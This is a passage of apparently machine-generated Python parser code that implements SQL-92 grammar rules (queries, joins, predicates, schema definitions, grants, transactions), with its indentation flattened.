def _interval_primary_(self):
self._value_expression_primary_()
with self._optional():
self._interval_qualifier_()
@graken()
def _interval_value_expression_1_(self):
self._interval_value_expression_()
@graken()
def _interval_term_1_(self):
self._interval_term_()
@graken()
def _interval_term_2_(self):
self._interval_term_()
@graken()
def _row_value_constructor_(self):
with self._choice():
with self._option():
self._row_value_constructor_element_()
with self._option():
self._left_paren_()
self._row_value_constructor_list_()
self._right_paren_()
with self._option():
self._subquery_()
self._error('no available options')
@graken()
def _row_value_constructor_list_(self):
def sep0():
self._token(',')
def block0():
self._row_value_constructor_element_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _row_value_constructor_element_(self):
with self._choice():
with self._option():
self._value_expression_()
with self._option():
self._token('NULL')
with self._option():
self._token('DEFAULT')
self._error('expecting one of: DEFAULT NULL')
@graken()
def _table_value_constructor_(self):
self._token('VALUES')
self._table_value_constructor_list_()
@graken()
def _table_value_constructor_list_(self):
def sep0():
self._token(',')
def block0():
self._row_value_constructor_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _table_expression_(self):
self._from_clause_()
with self._optional():
self._where_clause_()
with self._optional():
self._group_by_clause_()
with self._optional():
self._having_clause_()
@graken()
def _from_clause_(self):
self._token('FROM')
def sep0():
self._token(',')
def block0():
self._table_reference_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _joined_table_(self):
with self._choice():
with self._option():
self._cross_join_()
with self._option():
self._qualified_join_()
with self._option():
self._left_paren_()
self._joined_table_()
self._right_paren_()
self._error('no available options')
@graken()
def _cross_join_(self):
self._table_reference_()
self._token('CROSS')
self._token('JOIN')
self._table_reference_()
@graken()
def _qualified_join_(self):
self._table_reference_()
with self._optional():
self._token('NATURAL')
with self._optional():
self._join_type_()
self._token('JOIN')
self._table_reference_()
with self._optional():
self._join_specification_()
@graken()
def _join_specification_(self):
with self._choice():
with self._option():
self._join_condition_()
with self._option():
self._named_columns_join_()
self._error('no available options')
@graken()
def _join_condition_(self):
self._token('ON')
self._search_condition_()
@graken()
def _named_columns_join_(self):
self._token('USING')
self._left_paren_()
self._column_name_list_()
self._right_paren_()
@graken()
def _join_type_(self):
with self._choice():
with self._option():
self._token('INNER')
with self._option():
self._outer_join_type_()
with self._optional():
self._token('OUTER')
with self._option():
self._token('UNION')
self._error('expecting one of: INNER UNION')
@graken()
def _outer_join_type_(self):
with self._choice():
with self._option():
self._token('LEFT')
with self._option():
self._token('RIGHT')
with self._option():
self._token('FULL')
self._error('expecting one of: FULL LEFT RIGHT')
@graken()
def _where_clause_(self):
self._token('WHERE')
self._search_condition_()
@graken()
def _group_by_clause_(self):
self._token('GROUP')
self._token('BY')
self._grouping_column_reference_list_()
@graken()
def _grouping_column_reference_list_(self):
def sep0():
self._token(',')
def block0():
self._grouping_column_reference_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _grouping_column_reference_(self):
self._column_reference_()
with self._optional():
self._collate_clause_()
@graken()
def _having_clause_(self):
self._token('HAVING')
self._search_condition_()
@graken()
def _query_specification_(self):
self._token('SELECT')
with self._optional():
self._set_quantifier_()
self._select_list_()
self._table_expression_()
@graken()
def _select_list_(self):
with self._choice():
with self._option():
self._asterisk_()
with self._option():
def sep0():
self._token(',')
def block0():
self._select_sublist_()
self._positive_closure(block0, prefix=sep0)
self._error('no available options')
@graken()
def _select_sublist_(self):
with self._choice():
with self._option():
self._derived_column_()
with self._option():
self._qualifier_()
self._period_()
self._asterisk_()
self._error('no available options')
@graken()
def _derived_column_(self):
self._value_expression_()
with self._optional():
self._as_clause_()
@graken()
def _as_clause_(self):
with self._optional():
self._token('AS')
self._identifier_()
@graken()
def _query_expression_(self):
with self._choice():
with self._option():
self._non_join_query_expression_()
with self._option():
self._joined_table_()
self._error('no available options')
@graken()
def _non_join_query_expression_(self):
with self._choice():
with self._option():
self._non_join_query_term_()
with self._option():
self._query_expression_()
self._token('UNION')
with self._optional():
self._token('ALL')
with self._optional():
self._corresponding_spec_()
self._query_term_()
with self._option():
self._query_expression_()
self._token('EXCEPT')
with self._optional():
self._token('ALL')
with self._optional():
self._corresponding_spec_()
self._query_term_()
self._error('no available options')
@graken()
def _query_term_(self):
with self._choice():
with self._option():
self._non_join_query_term_()
with self._option():
self._joined_table_()
self._error('no available options')
@graken()
def _non_join_query_term_(self):
with self._choice():
with self._option():
self._non_join_query_primary_()
with self._option():
self._query_term_()
self._token('INTERSECT')
with self._optional():
self._token('ALL')
with self._optional():
self._corresponding_spec_()
self._query_primary_()
self._error('no available options')
@graken()
def _query_primary_(self):
with self._choice():
with self._option():
self._non_join_query_primary_()
with self._option():
self._joined_table_()
self._error('no available options')
@graken()
def _non_join_query_primary_(self):
with self._choice():
with self._option():
self._simple_table_()
with self._option():
self._left_paren_()
self._non_join_query_expression_()
self._right_paren_()
self._error('no available options')
@graken()
def _simple_table_(self):
with self._choice():
with self._option():
self._query_specification_()
with self._option():
self._table_value_constructor_()
with self._option():
self._explicit_table_()
self._error('no available options')
@graken()
def _explicit_table_(self):
self._token('TABLE')
self._table_name_()
@graken()
def _corresponding_spec_(self):
self._token('CORRESPONDING')
with self._optional():
self._token('BY')
self._left_paren_()
self._column_name_list_()
self._right_paren_()
@graken()
def _subquery_(self):
self._left_paren_()
self._query_expression_()
self._right_paren_()
@graken()
def _predicate_(self):
with self._choice():
with self._option():
self._comparison_predicate_()
with self._option():
self._between_predicate_()
with self._option():
self._in_predicate_()
with self._option():
self._like_predicate_()
with self._option():
self._null_predicate_()
with self._option():
self._quantified_comparison_predicate_()
with self._option():
self._exists_predicate_()
with self._option():
self._unique_predicate_()
with self._option():
self._match_predicate_()
with self._option():
self._overlaps_predicate_()
self._error('no available options')
@graken()
def _comparison_predicate_(self):
self._row_value_constructor_()
self._comp_op_()
self._row_value_constructor_()
@graken()
def _comp_op_(self):
with self._choice():
with self._option():
self._equals_operator_()
with self._option():
self._not_equals_operator_()
with self._option():
self._less_than_operator_()
with self._option():
self._greater_than_operator_()
with self._option():
self._less_than_or_equals_operator_()
with self._option():
self._greater_than_or_equals_operator_()
self._error('no available options')
@graken()
def _between_predicate_(self):
self._row_value_constructor_()
with self._optional():
self._token('NOT')
self._token('BETWEEN')
self._row_value_constructor_()
self._token('AND')
self._row_value_constructor_()
@graken()
def _in_predicate_(self):
self._row_value_constructor_()
with self._optional():
self._token('NOT')
self._token('IN')
self._in_predicate_value_()
@graken()
def _in_predicate_value_(self):
with self._choice():
with self._option():
self._subquery_()
with self._option():
self._left_paren_()
self._in_value_list_()
self._right_paren_()
self._error('no available options')
@graken()
def _in_value_list_(self):
self._value_expression_()
def block0():
self._comma_()
self._value_expression_()
self._positive_closure(block0)
@graken()
def _like_predicate_(self):
self._character_value_expression_()
with self._optional():
self._token('NOT')
self._token('LIKE')
self._character_value_expression_()
with self._optional():
self._token('ESCAPE')
self._character_value_expression_()
@graken()
def _null_predicate_(self):
self._row_value_constructor_()
self._token('IS')
with self._optional():
self._token('NOT')
self._token('NULL')
@graken()
def _quantified_comparison_predicate_(self):
self._row_value_constructor_()
self._comp_op_()
self._quantifier_()
self._subquery_()
@graken()
def _quantifier_(self):
with self._choice():
with self._option():
self._token('ALL')
with self._option():
self._some_()
self._error('expecting one of: ALL')
@graken()
def _some_(self):
with self._choice():
with self._option():
self._token('SOME')
with self._option():
self._token('ANY')
self._error('expecting one of: ANY SOME')
@graken()
def _exists_predicate_(self):
self._token('EXISTS')
self._subquery_()
@graken()
def _unique_predicate_(self):
self._token('UNIQUE')
self._subquery_()
@graken()
def _match_predicate_(self):
self._row_value_constructor_()
self._token('MATCH')
with self._optional():
self._token('UNIQUE')
with self._optional():
with self._choice():
with self._option():
self._token('PARTIAL')
with self._option():
self._token('FULL')
self._error('expecting one of: FULL PARTIAL')
self._subquery_()
@graken()
def _overlaps_predicate_(self):
self._row_value_constructor_()
self._token('OVERLAPS')
self._row_value_constructor_()
@graken()
def _search_condition_(self):
with self._choice():
with self._option():
self._boolean_term_()
with self._option():
self._search_condition_()
self._token('OR')
self._boolean_term_()
self._error('no available options')
@graken()
def _boolean_term_(self):
with self._choice():
with self._option():
self._boolean_factor_()
with self._option():
self._boolean_term_()
self._token('AND')
self._boolean_factor_()
self._error('no available options')
@graken()
def _boolean_factor_(self):
with self._optional():
self._token('NOT')
self._boolean_test_()
@graken()
def _boolean_test_(self):
self._boolean_primary_()
with self._optional():
self._token('IS')
with self._optional():
self._token('NOT')
self._truth_value_()
@graken()
def _truth_value_(self):
with self._choice():
with self._option():
self._token('TRUE')
with self._option():
self._token('FALSE')
with self._option():
self._token('UNKNOWN')
self._error('expecting one of: FALSE TRUE UNKNOWN')
@graken()
def _boolean_primary_(self):
with self._choice():
with self._option():
self._predicate_()
with self._option():
self._left_paren_()
self._search_condition_()
self._right_paren_()
self._error('no available options')
@graken()
def _interval_qualifier_(self):
with self._choice():
with self._option():
self._start_field_()
self._token('TO')
self._end_field_()
with self._option():
self._single_datetime_field_()
self._error('no available options')
@graken()
def _start_field_(self):
self._non_second_datetime_field_()
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
@graken()
def _end_field_(self):
with self._choice():
with self._option():
self._non_second_datetime_field_()
with self._option():
self._token('SECOND')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
self._error('expecting one of: SECOND')
@graken()
def _single_datetime_field_(self):
with self._choice():
with self._option():
self._non_second_datetime_field_()
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
with self._option():
self._token('SECOND')
with self._optional():
self._left_paren_()
self._precision_()
with self._optional():
self._comma_()
self._precision_()
self._right_paren_()
self._error('expecting one of: SECOND')
@graken()
def _datetime_field_(self):
with self._choice():
with self._option():
self._non_second_datetime_field_()
with self._option():
self._token('SECOND')
self._error('expecting one of: SECOND')
@graken()
def _non_second_datetime_field_(self):
with self._choice():
with self._option():
self._token('YEAR')
with self._option():
self._token('MONTH')
with self._option():
self._token('DAY')
with self._option():
self._token('HOUR')
with self._option():
self._token('MINUTE')
self._error('expecting one of: DAY HOUR MINUTE MONTH YEAR')
@graken()
def _privileges_(self):
with self._choice():
with self._option():
self._token('ALL')
self._token('PRIVILEGES')
with self._option():
self._action_list_()
self._error('expecting one of: ALL')
@graken()
def _action_list_(self):
def sep0():
self._token(',')
def block0():
self._action_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _action_(self):
with self._choice():
with self._option():
self._token('SELECT')
with self._option():
self._token('DELETE')
with self._option():
self._token('INSERT')
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._token('UPDATE')
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._token('REFERENCES')
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._token('USAGE')
self._error('expecting one of: DELETE INSERT REFERENCES SELECT UPDATE USAGE')
@graken()
def _grantee_(self):
with self._choice():
with self._option():
self._token('PUBLIC')
with self._option():
self._identifier_()
self._error('expecting one of: PUBLIC')
@graken()
def _collate_clause_(self):
self._token('COLLATE')
self._schema_qualified_name_()
@graken()
def _constraint_name_definition_(self):
self._token('CONSTRAINT')
self._schema_qualified_name_()
@graken()
def _constraint_attributes_(self):
with self._choice():
with self._option():
self._constraint_check_time_()
with self._optional():
with self._optional():
self._token('NOT')
self._token('DEFERRABLE')
with self._option():
with self._optional():
self._token('NOT')
self._token('DEFERRABLE')
with self._optional():
self._constraint_check_time_()
self._error('expecting one of: DEFERRABLE NOT')
@graken()
def _constraint_check_time_(self):
with self._choice():
with self._option():
self._token('INITIALLY')
self._token('DEFERRED')
with self._option():
self._token('INITIALLY')
self._token('IMMEDIATE')
self._error('expecting one of: INITIALLY')
@graken()
def _schema_definition_(self):
self._token('CREATE')
self._token('SCHEMA')
self._schema_name_clause_()
with self._optional():
self._schema_character_set_specification_()
with self._optional():
def block0():
self._schema_element_()
self._positive_closure(block0)
@graken()
def _schema_name_clause_(self):
with self._choice():
with self._option():
self._schema_name_()
with self._option():
self._token('AUTHORIZATION')
self._identifier_()
with self._option():
self._schema_name_()
self._token('AUTHORIZATION')
self._identifier_()
self._error('no available options')
@graken()
def _schema_character_set_specification_(self):
self._token('DEFAULT')
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
@graken()
def _schema_element_(self):
with self._choice():
with self._option():
self._domain_definition_()
with self._option():
self._table_definition_()
with self._option():
self._view_definition_()
with self._option():
self._grant_statement_()
with self._option():
self._assertion_definition_()
with self._option():
self._character_set_definition_()
with self._option():
self._collation_definition_()
with self._option():
self._translation_definition_()
self._error('no available options')
@graken()
def _drop_schema_statement_(self):
self._token('DROP')
self._token('SCHEMA')
self._schema_name_()
self._drop_behavior_()
@graken()
def _drop_behavior_(self):
with self._choice():
with self._option():
self._token('CASCADE')
with self._option():
self._token('RESTRICT')
self._error('expecting one of: CASCADE RESTRICT')
@graken()
def _table_definition_(self):
self._token('CREATE')
with self._optional():
with self._group():
with self._choice():
with self._option():
self._token('GLOBAL')
with self._option():
self._token('LOCAL')
self._error('expecting one of: GLOBAL LOCAL')
self._token('TEMPORARY')
self._token('TABLE')
self._table_name_()
self._table_element_list_()
with self._optional():
self._token('ON')
self._token('COMMIT')
with self._group():
with self._choice():
with self._option():
self._token('DELETE')
with self._option():
self._token('PRESERVE')
self._error('expecting one of: DELETE PRESERVE')
self._token('ROWS')
@graken()
def _table_element_list_(self):
self._left_paren_()
def sep0():
self._token(',')
def block0():
self._table_element_()
self._positive_closure(block0, prefix=sep0)
self._right_paren_()
@graken()
def _table_element_(self):
with self._choice():
with self._option():
self._column_definition_()
with self._option():
self._table_constraint_definition_()
self._error('no available options')
@graken()
def _column_definition_(self):
self._identifier_()
with self._group():
with self._choice():
with self._option():
self._data_type_()
with self._option():
self._schema_qualified_name_()
self._error('no available options')
with self._optional():
self._default_clause_()
with self._optional():
def block1():
self._column_constraint_definition_()
self._positive_closure(block1)
with self._optional():
self._collate_clause_()
@graken()
def _column_constraint_definition_(self):
with self._optional():
self._constraint_name_definition_()
self._column_constraint_()
with self._optional():
self._constraint_attributes_()
@graken()
def _column_constraint_(self):
with self._choice():
with self._option():
self._token('NOT')
self._token('NULL')
with self._option():
self._unique_specification_()
with self._option():
self._references_specification_()
with self._option():
self._check_constraint_definition_()
self._error('expecting one of: NOT')
@graken()
def _default_clause_(self):
self._token('DEFAULT')
self._default_option_()
@graken()
def _default_option_(self):
with self._choice():
with self._option():
self._literal_()
with self._option():
self._datetime_value_function_()
with self._option():
self._token('USER')
with self._option():
self._token('CURRENT_USER')
with self._option():
self._token('SESSION_USER')
with self._option():
self._token('SYSTEM_USER')
with self._option():
self._token('NULL')
self._error('expecting one of: CURRENT_USER NULL SESSION_USER SYSTEM_USER USER')
@graken()
def _table_constraint_definition_(self):
with self._optional():
self._constraint_name_definition_()
self._table_constraint_()
with self._optional():
self._constraint_attributes_()
@graken()
def _table_constraint_(self):
with self._choice():
with self._option():
self._unique_constraint_definition_()
with self._option():
self._referential_constraint_definition_()
with self._option():
self._check_constraint_definition_()
self._error('no available options')
@graken()
def _unique_constraint_definition_(self):
self._unique_specification_()
self._left_paren_()
self._column_name_list_()
self._right_paren_()
@graken()
def _unique_specification_(self):
with self._choice():
with self._option():
self._token('UNIQUE')
with self._option():
self._token('PRIMARY')
self._token('KEY')
self._error('expecting one of: PRIMARY UNIQUE')
@graken()
def _referential_constraint_definition_(self):
self._token('FOREIGN')
self._token('KEY')
self._left_paren_()
self._column_name_list_()
self._right_paren_()
self._references_specification_()
@graken()
def _references_specification_(self):
self._token('REFERENCES')
self._referenced_table_and_columns_()
with self._optional():
self._token('MATCH')
self._match_type_()
with self._optional():
self._referential_triggered_action_()
@graken()
def _match_type_(self):
with self._choice():
with self._option():
self._token('FULL')
with self._option():
self._token('PARTIAL')
self._error('expecting one of: FULL PARTIAL')
@graken()
def _referenced_table_and_columns_(self):
self._table_name_()
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
@graken()
def _referential_triggered_action_(self):
with self._choice():
with self._option():
self._update_rule_()
with self._optional():
self._delete_rule_()
with self._option():
self._delete_rule_()
with self._optional():
self._update_rule_()
self._error('no available options')
@graken()
def _update_rule_(self):
self._token('ON')
self._token('UPDATE')
self._referential_action_()
@graken()
def _delete_rule_(self):
self._token('ON')
self._token('DELETE')
self._referential_action_()
@graken()
def _referential_action_(self):
with self._choice():
with self._option():
self._token('CASCADE')
with self._option():
self._token('SET')
self._token('NULL')
with self._option():
self._token('SET')
self._token('DEFAULT')
with self._option():
self._token('NO')
self._token('ACTION')
self._error('expecting one of: CASCADE NO SET')
@graken()
def _check_constraint_definition_(self):
self._token('CHECK')
self._left_paren_()
self._search_condition_()
self._right_paren_()
@graken()
def _alter_table_statement_(self):
self._token('ALTER')
self._token('TABLE')
self._table_name_()
self._alter_table_action_()
@graken()
def _alter_table_action_(self):
with self._choice():
with self._option():
self._add_column_definition_()
with self._option():
self._alter_column_definition_()
with self._option():
self._drop_column_definition_()
with self._option():
self._add_table_constraint_definition_()
with self._option():
self._drop_table_constraint_definition_()
self._error('no available options')
@graken()
def _add_column_definition_(self):
self._token('ADD')
with self._optional():
self._token('COLUMN')
self._column_definition_()
@graken()
def _alter_column_definition_(self):
self._token('ALTER')
with self._optional():
self._token('COLUMN')
self._identifier_()
self._alter_column_action_()
@graken()
def _alter_column_action_(self):
with self._choice():
with self._option():
self._set_column_default_clause_()
with self._option():
self._drop_column_default_clause_()
self._error('no available options')
@graken()
def _set_column_default_clause_(self):
self._token('SET')
self._default_clause_()
@graken()
def _drop_column_default_clause_(self):
self._token('DROP')
self._token('DEFAULT')
@graken()
def _drop_column_definition_(self):
self._token('DROP')
with self._optional():
self._token('COLUMN')
self._identifier_()
self._drop_behavior_()
@graken()
def _add_table_constraint_definition_(self):
self._token('ADD')
self._table_constraint_definition_()
@graken()
def _drop_table_constraint_definition_(self):
self._token('DROP')
self._token('CONSTRAINT')
self._schema_qualified_name_()
self._drop_behavior_()
@graken()
def _drop_table_statement_(self):
self._token('DROP')
self._token('TABLE')
self._table_name_()
self._drop_behavior_()
@graken()
def _view_definition_(self):
self._token('CREATE')
self._token('VIEW')
self._table_name_()
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
self._token('AS')
self._query_expression_()
with self._optional():
self._token('WITH')
with self._optional():
self._levels_clause_()
self._token('CHECK')
self._token('OPTION')
@graken()
def _levels_clause_(self):
with self._choice():
with self._option():
self._token('CASCADED')
with self._option():
self._token('LOCAL')
self._error('expecting one of: CASCADED LOCAL')
@graken()
def _drop_view_statement_(self):
self._token('DROP')
self._token('VIEW')
self._table_name_()
self._drop_behavior_()
@graken()
def _domain_definition_(self):
self._token('CREATE')
self._token('DOMAIN')
self._schema_qualified_name_()
with self._optional():
self._token('AS')
self._data_type_()
with self._optional():
self._default_clause_()
with self._optional():
def block0():
self._domain_constraint_()
self._positive_closure(block0)
with self._optional():
self._collate_clause_()
@graken()
def _domain_constraint_(self):
with self._optional():
self._constraint_name_definition_()
self._check_constraint_definition_()
with self._optional():
self._constraint_attributes_()
@graken()
def _alter_domain_statement_(self):
self._token('ALTER')
self._token('DOMAIN')
self._schema_qualified_name_()
self._alter_domain_action_()
@graken()
def _alter_domain_action_(self):
with self._choice():
with self._option():
self._set_domain_default_clause_()
with self._option():
self._drop_domain_default_clause_()
with self._option():
self._add_domain_constraint_definition_()
with self._option():
self._drop_domain_constraint_definition_()
self._error('no available options')
@graken()
def _set_domain_default_clause_(self):
self._token('SET')
self._default_clause_()
@graken()
def _drop_domain_default_clause_(self):
self._token('DROP')
self._token('DEFAULT')
@graken()
def _add_domain_constraint_definition_(self):
self._token('ADD')
self._domain_constraint_()
@graken()
def _drop_domain_constraint_definition_(self):
self._token('DROP')
self._token('CONSTRAINT')
self._schema_qualified_name_()
@graken()
def _drop_domain_statement_(self):
self._token('DROP')
self._token('DOMAIN')
self._schema_qualified_name_()
self._drop_behavior_()
@graken()
def _character_set_definition_(self):
self._token('CREATE')
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
with self._optional():
self._token('AS')
self._character_set_source_()
with self._optional():
with self._choice():
with self._option():
self._collate_clause_()
with self._option():
self._limited_collation_definition_()
self._error('no available options')
@graken()
def _character_set_source_(self):
self._token('GET')
self._character_set_name_()
@graken()
def _limited_collation_definition_(self):
self._token('COLLATION')
self._token('FROM')
self._collation_source_()
@graken()
def _drop_character_set_statement_(self):
self._token('DROP')
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
@graken()
def _collation_definition_(self):
self._token('CREATE')
self._token('COLLATION')
self._schema_qualified_name_()
self._token('FOR')
self._character_set_name_()
self._token('FROM')
self._collation_source_()
with self._optional():
self._pad_attribute_()
@graken()
def _pad_attribute_(self):
with self._choice():
with self._option():
self._token('NO')
self._token('PAD')
with self._option():
self._token('PAD')
self._token('SPACE')
self._error('expecting one of: NO PAD')
@graken()
def _collation_source_(self):
with self._choice():
with self._option():
self._collating_sequence_definition_()
with self._option():
self._translation_collation_()
self._error('no available options')
@graken()
def _collating_sequence_definition_(self):
with self._choice():
with self._option():
self._external_collation_()
with self._option():
self._schema_qualified_name_()
with self._option():
self._token('DESC')
self._left_paren_()
self._schema_qualified_name_()
self._right_paren_()
with self._option():
self._token('DEFAULT')
self._error('expecting one of: DEFAULT')
@graken()
def _translation_collation_(self):
self._token('TRANSLATION')
self._schema_qualified_name_()
with self._optional():
self._token('THEN')
self._token('COLLATION')
self._schema_qualified_name_()
@graken()
def _external_collation_(self):
self._token('EXTERNAL')
self._left_paren_()
self._quote_()
self._schema_qualified_name_()
self._quote_()
self._right_paren_()
@graken()
def _drop_collation_statement_(self):
self._token('DROP')
self._token('COLLATION')
self._schema_qualified_name_()
@graken()
def _translation_definition_(self):
self._token('CREATE')
self._token('TRANSLATION')
self._schema_qualified_name_()
self._token('FOR')
self._character_set_name_()
self._token('TO')
self._character_set_name_()
self._token('FROM')
self._translation_specification_()
@graken()
def _translation_specification_(self):
with self._choice():
with self._option():
self._external_translation_()
with self._option():
self._token('IDENTITY')
with self._option():
self._schema_qualified_name_()
self._error('expecting one of: IDENTITY')
@graken()
def _external_translation_(self):
self._token('EXTERNAL')
self._left_paren_()
self._quote_()
self._schema_qualified_name_()
self._quote_()
self._right_paren_()
@graken()
def _drop_translation_statement_(self):
self._token('DROP')
self._token('TRANSLATION')
self._schema_qualified_name_()
@graken()
def _assertion_definition_(self):
self._token('CREATE')
self._token('ASSERTION')
self._schema_qualified_name_()
self._assertion_check_()
with self._optional():
self._constraint_attributes_()
@graken()
def _assertion_check_(self):
self._token('CHECK')
self._left_paren_()
self._search_condition_()
self._right_paren_()
@graken()
def _drop_assertion_statement_(self):
self._token('DROP')
self._token('ASSERTION')
self._schema_qualified_name_()
@graken()
def _grant_statement_(self):
self._token('GRANT')
self._privileges_()
self._token('ON')
self._object_name_()
self._token('TO')
def sep0():
self._token(',')
def block0():
self._grantee_()
self._positive_closure(block0, prefix=sep0)
with self._optional():
self._token('WITH')
self._token('GRANT')
self._token('OPTION')
@graken()
def _object_name_(self):
with self._choice():
with self._option():
with self._optional():
self._token('TABLE')
self._table_name_()
with self._option():
self._token('DOMAIN')
self._schema_qualified_name_()
with self._option():
self._token('COLLATION')
self._schema_qualified_name_()
with self._option():
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
with self._option():
self._token('TRANSLATION')
self._schema_qualified_name_()
self._error('no available options')
@graken()
def _revoke_statement_(self):
self._token('REVOKE')
with self._optional():
self._token('GRANT')
self._token('OPTION')
self._token('FOR')
self._privileges_()
self._token('ON')
self._object_name_()
self._token('FROM')
def sep0():
self._token(',')
def block0():
self._grantee_()
self._positive_closure(block0, prefix=sep0)
self._drop_behavior_()
@graken()
def _sql_schema_statement_(self):
with self._choice():
with self._option():
self._sql_schema_definition_statement_()
with self._option():
self._sql_schema_manipulation_statement_()
self._error('no available options')
@graken()
def _sql_schema_definition_statement_(self):
with self._choice():
with self._option():
self._schema_definition_()
with self._option():
self._table_definition_()
with self._option():
self._view_definition_()
with self._option():
self._grant_statement_()
with self._option():
self._domain_definition_()
with self._option():
self._character_set_definition_()
with self._option():
self._collation_definition_()
with self._option():
self._translation_definition_()
with self._option():
self._assertion_definition_()
self._error('no available options')
@graken()
def _sql_schema_manipulation_statement_(self):
with self._choice():
with self._option():
self._drop_schema_statement_()
with self._option():
self._alter_table_statement_()
with self._option():
self._drop_table_statement_()
with self._option():
self._drop_view_statement_()
with self._option():
self._revoke_statement_()
with self._option():
self._alter_domain_statement_()
with self._option():
self._drop_domain_statement_()
with self._option():
self._drop_character_set_statement_()
with self._option():
self._drop_collation_statement_()
with self._option():
self._drop_translation_statement_()
with self._option():
self._drop_assertion_statement_()
self._error('no available options')
@graken()
def _sql_transaction_statement_(self):
with self._choice():
with self._option():
self._set_transaction_statement_()
with self._option():
self._set_constraints_mode_statement_()
with self._option():
self._commit_statement_()
with self._option():
self._rollback_statement_()
self._error('no available options')
@graken()
def _sql_connection_statement_(self):
with self._choice():
with self._option():
self._connect_statement_()
with self._option():
self._set_connection_statement_()
with self._option():
self._disconnect_statement_()
self._error('no available options')
@graken()
def _sql_session_statement_(self):
with self._choice():
with self._option():
self._set_catalog_statement_()
with self._option():
self._set_schema_statement_()
with self._option():
self._set_names_statement_()
with self._option():
self._set_session_authorization_identifier_statement_()
with self._option():
self._set_local_time_zone_statement_()
self._error('no available options')
@graken()
def _order_by_clause_(self):
self._token('ORDER')
self._token('BY')
self._sort_specification_list_()
@graken()
def _sort_specification_list_(self):
def sep0():
self._token(',')
def block0():
self._sort_specification_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _sort_specification_(self):
self._sort_key_()
with self._optional():
self._collate_clause_()
with self._optional():
self._ordering_specification_()
@graken()
def _sort_key_(self):
with self._choice():
with self._option():
self._identifier_()
with self._option():
self._unsigned_integer_()
self._error('no available options')
@graken()
def _ordering_specification_(self):
with self._choice():
with self._option():
self._token('ASC')
with self._option():
self._token('DESC')
self._error('expecting one of: ASC DESC')
@graken()
def _delete_statement_searched_(self):
self._token('DELETE')
self._token('FROM')
self._table_name_()
with self._optional():
self._token('WHERE')
self._search_condition_()
@graken()
def _insert_statement_(self):
self._token('INSERT')
self._token('INTO')
self._table_name_()
self._insert_columns_and_source_()
@graken()
def _insert_columns_and_source_(self):
with self._choice():
with self._option():
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
self._query_expression_()
with self._option():
self._token('DEFAULT')
self._token('VALUES')
self._error('expecting one of: DEFAULT')
@graken()
def _set_clause_list_(self):
def sep0():
self._token(',')
def block0():
self._set_clause_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _set_clause_(self):
self._identifier_()
self._equals_operator_()
self._update_source_()
@graken()
def _update_source_(self):
with self._choice():
with self._option():
self._value_expression_()
with self._option():
self._token('NULL')
with self._option():
self._token('DEFAULT')
self._error('expecting one of: DEFAULT NULL')
@graken()
def _update_statement_searched_(self):
self._token('UPDATE')
self._table_name_()
self._token('SET')
self._set_clause_list_()
with self._optional():
self._token('WHERE')
self._search_condition_()
@graken()
def _temporary_table_declaration_(self):
self._token('DECLARE')
self._token('LOCAL')
self._token('TEMPORARY')
self._token('TABLE')
self._qualified_local_table_name_()
self._table_element_list_()
with self._optional():
self._token('ON')
self._token('COMMIT')
with self._group():
with self._choice():
with self._option():
self._token('PRESERVE')
with self._option():
self._token('DELETE')
self._error('expecting one of: DELETE PRESERVE')
self._token('ROWS')
@graken()
def _set_transaction_statement_(self):
self._token('SET')
self._token('TRANSACTION')
def sep0():
self._token(',')
def block0():
self._transaction_mode_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _transaction_mode_(self):
with self._choice():
with self._option():
self._isolation_level_()
with self._option():
self._transaction_access_mode_()
with self._option():
self._diagnostics_size_()
self._error('no available options')
@graken()
def _transaction_access_mode_(self):
with self._choice():
with self._option():
self._token('READ')
self._token('ONLY')
with self._option():
self._token('READ')
self._token('WRITE')
self._error('expecting one of: READ')
@graken()
def _isolation_level_(self):
self._token('ISOLATION')
self._token('LEVEL')
self._level_of_isolation_()
@graken()
def _level_of_isolation_(self):
with self._choice():
with self._option():
self._token('READ')
self._token('UNCOMMITTED')
with self._option():
self._token('READ')
self._token('COMMITTED')
with self._option():
self._token('REPEATABLE')
self._token('READ')
with self._option():
self._token('SERIALIZABLE')
self._error('expecting one of: READ REPEATABLE SERIALIZABLE')
@graken()
def _diagnostics_size_(self):
self._token('DIAGNOSTICS')
self._token('SIZE')
self._simple_value_specification_()
@graken()
def _set_constraints_mode_statement_(self):
self._token('SET')
self._token('CONSTRAINTS')
self._constraint_name_list_()
with self._group():
with self._choice():
with self._option():
self._token('DEFERRED')
with self._option():
self._token('IMMEDIATE')
self._error('expecting one of: DEFERRED IMMEDIATE')
@graken()
def _constraint_name_list_(self):
with self._choice():
with self._option():
self._token('ALL')
with self._option():
def sep0():
self._token(',')
def block0():
self._schema_qualified_name_()
self._positive_closure(block0, prefix=sep0)
self._error('expecting one of: ALL')
@graken()
def _commit_statement_(self):
self._token('COMMIT')
with self._optional():
self._token('WORK')
@graken()
def _rollback_statement_(self):
self._token('ROLLBACK')
with self._optional():
self._token('WORK')
@graken()
def _connect_statement_(self):
self._token('CONNECT')
self._token('TO')
self._connection_target_()
@graken()
def _connection_target_(self):
with self._choice():
with self._option():
self._simple_value_specification_()
with self._optional():
self._token('AS')
self._connection_name_()
with self._optional():
self._token('USER')
self._simple_value_specification_()
with self._option():
self._token('DEFAULT')
self._error('expecting one of: DEFAULT')
@graken()
def _set_connection_statement_(self):
self._token('SET')
self._token('CONNECTION')
self._connection_object_()
@graken()
def _connection_object_(self):
with self._choice():
with self._option():
self._token('DEFAULT')
with self._option():
